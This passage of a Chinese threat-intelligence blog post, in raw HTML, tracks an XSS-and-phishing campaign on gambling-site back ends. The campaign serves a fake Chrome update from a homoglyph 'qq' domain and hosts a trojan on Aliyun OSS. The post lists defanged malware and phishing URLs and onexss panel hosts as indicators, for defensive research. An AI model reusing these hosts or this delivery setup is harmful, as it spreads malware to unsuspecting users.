Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">flash.ec</span></code><span leaf=""> 确实也是攻击者的资产的话，那么到这里黑客的身份似乎又加了一层 Buff —— 菠菜猎人。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">起初看到 CredsLeaker 的时候我有想过，是不是国内的某些大厂红队打算拿 CSDN 供应链打一些目标来着，只不过玩的有点大被曝光了，而这些基础设施都是他们用来打 hw 用的。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">但是一般正经的大厂也不会打那么多菠菜吧，反诈公司有可能会打菠菜，但是不太可能会去打 CSDN。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">那么除了反诈公司还有谁会打这么多菠菜呢？洗盘子黑吃黑的？友商？</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">比较奇怪的是这些域名现在都无法访问了，xss 的 payload 都还在，是这些网站都已经没有价值了么？</span></p><h4 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: block;"><span style="display: none;"></span><span style="font-size: 18px;color: rgb(0, 0, 0);line-height: 1.5em;letter-spacing: 0em;text-align: left;font-weight: bold;display: block;"><span leaf="">第四次定性转折 - 菠菜猎人now</span></span><span style="display: none;"></span></h4><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">一开始跟进 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">flash[.]ec</span></code><span leaf=""> 发现菠菜之后就继续分析其他 ioc 去了，因为都没办法访问了，就没有再继续深入。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">后来写完回了检查的时候有了新的发现，新发现源于</span><strong style="color: rgb(0, 0, 0);font-weight: bold;background-attachment: scroll;background-clip: border-box;background-color: rgba(0, 0, 0, 0);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgba(0, 0, 0, 0.4);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 0px;border-top-right-radius: 0px;border-bottom-right-radius: 0px;border-bottom-left-radius: 0px;"><span leaf="">互联网资产测绘平台的功能差异</span></strong><span leaf="">。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">之前搜索  &#34;上游签发证书校验失败&#34; 字符串是用 fofa 搜索的，只能搜索到 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">sslupdate[.]net</span></code><span leaf=""> 的 index。后来我用奇安信的 Hunter 搜索的时候发现结果多出来一些。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">分析发现原来是奇安信的 Hunter 爬取 web 的时候解析 js 比较彻底，XSS payload也会被解析完整，这就导致如果 payload 包含一个钓鱼页面，那么这个钓鱼页面的源码也会被采集到 response 结果当中，而 fofa 和 quake 就不会（非拉踩，各有长处）。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">所以当你使用hunter搜索 &#34;上游签发证书校验失败&#34; 的时候，你就能发现除了 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">sslupdate[.]net</span></code><span leaf=""> 还有不少被挂了钓鱼 js 的菠菜后台，多数的 URI 似乎是还是我们刚刚见过的  </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">/public.login.do</span></code><span leaf=""> 。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">但这次域名变了，不再是  </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">flash[.]ec</span></code><span leaf=""> ，而是一个新的域名 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">l.xn--y7aa[.]cc</span></code><span leaf=""> 。</span></p><p><img data-imgfileid="100001370" class="rich_pages wxw-img" data-ratio="0.5351773902585688" data-s="300,640" data-type="png" data-w="3326" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=bb15f95c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8YhsOTLrehjxuU8MiaicybBmkyuD2ibzgDQtR2XBibLAv8BwIUqodYdhib1Q%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">因为包含不少历史数据和重复数据，所以实际有效的结果没有显示的那么多。</span></p><p><img data-imgfileid="100001368" class="rich_pages wxw-img" data-ratio="0.54296875" data-s="300,640" data-type="png" data-w="1280" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=6aad04e8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8ibZz3Q9cBRtIWvWeXriaDyHB4SYn0Fib69jbxicZM0dKlefV5dh6rib8TQg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">打开一个页面分析了一下，不难看出来 L 子域名是用来托管 XSS payload，C 子域名用来托管钓鱼模板，最终木马托管在阿里云 OSS 上。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">payload为：</span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="https://l.xn--y7aa[.]cc/6647" target="_blank">https://l.xn--y7aa[.]cc/6647</a></span></code></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">拉取的假冒地址为：</span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="https://c.xn--y7aa[.]cc/ChromeUpdate.html" target="_blank">https://c.xn--y7aa[.]cc/ChromeUpdate.html</a></span></code></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">oss托管的木马地址为：</span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="https://applow.oss-cn-hongkong.aliyuncs[.]com/ChromeSetup.zip" target="_blank">https://applow.oss-cn-hongkong.aliyuncs[.]com/ChromeSetup.zip</a></span></code></p><p><img data-imgfileid="100001369" class="rich_pages wxw-img" data-ratio="0.5213193885760258" data-s="300,640" data-type="png" data-w="2486" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=dbc72036&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8puiaZgOiaHIic3Ps9YUuolD9SPKPKbp7ys8soPqT5qyfvPQybJOxdicFwA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">简单看了几个站似乎都是一样的。这个钓鱼模板跟 CSDN 那个不能说是很相似，也只能说是一毛一样。</span></p><p><img data-imgfileid="100001371" class="rich_pages wxw-img" data-ratio="0.5349219391947412" data-s="300,640" data-type="png" data-w="2434" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=045679d1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8TXBeTiblgB2xiaCWic6BcHggleW1hEuF6Z0bib8DzUjMRuvOwqB2TbB4aA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">这个域名注册的其实很讲究，选择了一个模仿 &#34;qq&#34; 的同形异义符。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">不过貌似现在对一般的浏览器效果不咋滴，直到我拿到VT搜才发现它是模仿的 qq。</span></p><p><img data-imgfileid="100001372" class="rich_pages wxw-img" data-ratio="0.5043795620437956" data-s="300,640" data-type="png" data-w="2740" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=17ae786b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8rfj0Hg3sEGN2KEg1PCDuQx8wdQrIyVDlmK6lX3PE5agT2bu4ic9tkPA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">这个域名也都挂了 cloudflare，结合这相似的子域名命名法，我们直接大胆猜测，</span><strong style="color: rgb(0, 0, 0);font-weight: bold;background-attachment: scroll;background-clip: border-box;background-color: rgba(0, 0, 0, 0);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgba(0, 0, 0, 0.4);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 0px;border-top-right-radius: 0px;border-bottom-right-radius: 0px;border-bottom-left-radius: 0px;"><span leaf="">这域名有没有可能就是 flash 的继承者</span></strong><span leaf="">。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">对这个域名进行简单的信息搜集，就可以发现 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">x.xn--y7aa[.]cc</span></code><span leaf=""> 也是xss平台的后台地址，用的也是onexss，而平台名字也自定义为 &#34;FromXS&#34;。</span></p><p><img data-imgfileid="100001374" class="rich_pages wxw-img" data-ratio="0.34156626506024096" data-s="300,640" data-type="png" data-w="3320" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=26e98076&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8Cv6LXVfZbTgs1qPhcXlYx6ibEEKib60huKAwxeyKT54rJG1JCwMJmO7g%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">实际上fofa直接搜索 title=&#34;FromXS&#34; 也能把它搜出来，当时看到标题没多想，以为是这套服务默认的。</span></p><p><img data-imgfileid="100001373" class="rich_pages wxw-img" data-ratio="0.5183887915936952" data-s="300,640" data-type="png" data-w="2284" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=925122c9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh81picWoKRbVtEV7SUUWluWXZQB8oNACIhdib3OU7daGnvYWXHxukm6cZQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">v.xn--y7aa[.]cc</span></code><span leaf=""> 也是个401认证。</span></p><p><img data-imgfileid="100001375" class="rich_pages wxw-img" data-ratio="0.2655172413793103" data-s="300,640" data-type="png" data-w="1740" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=d3a6ad1d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh84DHicecxeqzRXiaCJHkDPRjAN010F3qkhJAN9fW7EnS82481SbQlficwA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">而子域名 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">l.xn--y7aa[.]cc</span></code><span leaf=""> 就是拉取xss平台payload的域名。</span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: 